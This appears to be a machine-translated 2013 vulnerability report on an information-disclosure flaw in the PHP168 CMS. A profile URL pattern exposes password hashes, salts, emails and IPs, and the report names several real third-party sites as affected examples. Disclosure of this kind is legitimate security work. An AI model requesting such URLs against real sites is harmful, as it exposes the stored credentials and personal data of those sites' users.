PHP168 a magical loophole, you can query any user data-bug warning-the black bar safety net

2013-09-20T00:00:00
ID MYHACK58:62201340640
Type myhack58
Reporter Michael@乌云
Modified 2013-09-20T00:00:00

Description

Brief description:

Country micro-PHP168 appeared a magic array, can cause the whole station to the user data leakage. The leaked content includes total Station user passwords in cipher text, email, password, salt, IP and other sensitive information.

Detailed description:

PHP168 program built-in“user”module contains the user profile display page. In many practical scenarios, this page is not the front Desk use, but can be directly through the URL access. Page routing is:/homepage.php/[username]/member-profile

To PHP168 official demo site, for example, to view any user information page link for:

http://php168.cn/com/homepage.php/admin/member-profile

Since the module code appears in the phrase the magic of the array, causing the user data within the table all data is treated as an array out directly displayed.

!

Vulnerability proof:

The vulnerabilities affect the use of the CMS system of the site, to PHP168 web site customer case as an example:

http://www.zjfzol.com.cn/homepage.php/admin/member-profile

http://www.scswl.cn/homepage.php/admin/member-profile

http://www.tunet.edu.cn/homepage.php/admin/member-profile

http://www.itlead.com.cn/homepage.php/admin/member-profile

http://www.aedp.cn/homepage.php/admin/member-profile

http://www.qianlongnews.com/homepage.php/test/member-profile

http://ny.zlxk.com/gov/homepage.php/admin/member-profile

Repair solutions:

Remove the output